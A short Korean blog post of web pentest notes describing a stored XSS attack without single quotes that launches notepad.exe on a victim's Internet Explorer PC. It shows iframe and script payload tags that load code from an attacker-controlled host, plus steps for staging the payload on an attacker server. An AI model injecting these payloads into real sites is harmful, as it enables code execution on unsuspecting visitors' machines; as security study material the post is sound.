의미없는 블로그
싱글쿼터 없이 Stored XSS 시나리오 (notepad.exe 실행) 본문
싱글쿼터 안들어가는 XSS 구문
<iframe src=http://test.com></iframe>
<script src=http://test.com></script>
1) 공격자 서버(192.168.211.131)에 test.html 생성
2) test.html 내용 (희생자 PC의 notepad 실행시키는)
test.html
0.00MB
test2.html
0.00MB
3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버의 test.html 접속하는 스크립트)
4) 희생자가 XSS 포인트 클릭
5) 희생자 PC에서 notepad 실행됨
IE 취약한 브라우저에서만 된다
ActiveX 설정 관련
'# 나 > pentest (WEB)' 카테고리의 다른 글
| 파일 다운로드 모듬구이 (0) | 2019.12.06 |
|---|---|
| 싱글쿼터 없이 Stored XSS 시나리오 (쿠키 탈취) (0) | 2019.12.05 |
| [Tools] sqlmap 사용하기 (0) | 2019.11.20 |
| 의식의 흐름 기법 (0) | 2019.11.19 |
| 백업 및 임시파일 / 디렉터리 리스팅 (1) | 2019.11.19 |
'# 나/pentest (WEB)' Related Articles
more
Comments